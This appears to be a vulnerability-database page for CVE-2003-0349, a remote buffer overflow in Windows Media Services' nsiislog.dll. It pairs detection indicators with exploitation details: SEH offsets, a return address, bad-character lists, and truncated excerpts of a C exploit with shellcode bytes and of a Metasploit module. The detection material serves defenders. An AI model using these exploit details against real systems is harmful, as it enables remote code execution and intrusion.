CVE-2003-0349
published 2003-07-24CVE-2003-0349: Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
82.54%
99.6th percentile
Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x81\xeb\x4d\x43\x22\x11
- →Detect exploitation attempts by monitoring for large HTTP POST requests to /scripts/nsiislog.dll with a User-Agent of NSPlayer/* and a Pragma header containing xClientGUID. ↗
- →The exploit buffer begins with the header value 'MX_STATS_LogLine: ' followed by a large padding block; detect this string in POST body content to nsiislog.dll. ↗
- →The Metasploit module checks for the string 'NetShow ISAPI' in the response body to confirm the vulnerable endpoint is present. ↗
- →The exploit payload space is 1024 bytes with bad characters \x00\x2b\x26\x3d\x25\x0a\x0d\x20; use these constraints when writing shellcode-detection signatures. ↗
- →SEH overwrite offsets for targeting: Windows 2000 pre-MS03-019 at offset 9988, post-MS03-019 at offset 14088; Windows XP pre-MS03-019 at offset 9992. ↗
- →The exploit sends a POST body exceeding 16384 bytes (buffer created as rand_text_alphanumeric(256)*64) to trigger the SEH overflow; alert on POST requests to nsiislog.dll with Content-Length above 16000. ↗
- ·The module also works against the 'patched' MS03-019 version of nsiislog.dll, meaning MS03-019 patched systems remain exploitable and should not be considered fully remediated until MS03-022 is applied. ↗
- ·The default target in the Metasploit module is 'Brute Force' (target index 0), meaning exploitation attempts may cycle through multiple SEH offsets and return addresses rather than using a single fixed value. ↗
- ·The standalone exploit hardcodes the return address 0x40F01333 for Windows 2000 nsiislog.dll version 4.1.0.3917; different DLL versions use different offsets (e.g., 4.1.0.3931 uses offset 14092). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
exploitdb·2010-07-25
CVE-2003-0349 Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
---
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
'Description' => %q{
This exploits a buffer overflow found in the nsiislog.dll
ISAPI filter that comes with Windows Media Server. This
module will also work against the 'patched' MS03-019
version. This vulnerability was addressed by MS03-022.
},
'Author' => [ 'hdm' ],
'License' => MSF_LI
Exploit-DB
Microsoft Windows Media Services - Remote (MS03-022)
exploitdb·2003-07-01
CVE-2003-0349 Microsoft Windows Media Services - Remote (MS03-022)
Microsoft Windows Media Services - Remote (MS03-022)
---
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker //tN [The N0b0D1eS]
#include
#include
#include
#ifdef WIN32
#include
#pragma comment(lib, "wsock32")
#else
#include
#include
#include
#include
#include
#include
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif
char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x
Exploit-DB
Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow
exploitdb·2003-06-25
CVE-2003-0349 Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow
Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/8035/info
Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker //tN [The N0b0D1eS]
#include
#include
#include
#ifdef WIN32
#include
#pragma comment(lib, "wsock32")
#else
#include
#include
#include
#include
#include
#include
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define c
Metasploit
MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
metasploit
MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105665030925504&w=2http://secunia.com/advisories/9115http://securitytracker.com/id?1007059http://www.kb.cert.org/vuls/id/113716http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0306&L=NTBUGTRAQ&P=R4563https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-022https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A938http://marc.info/?l=bugtraq&m=105665030925504&w=2http://secunia.com/advisories/9115http://securitytracker.com/id?1007059http://www.kb.cert.org/vuls/id/113716http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0306&L=NTBUGTRAQ&P=R4563https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-022https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A938
2003-07-24
Published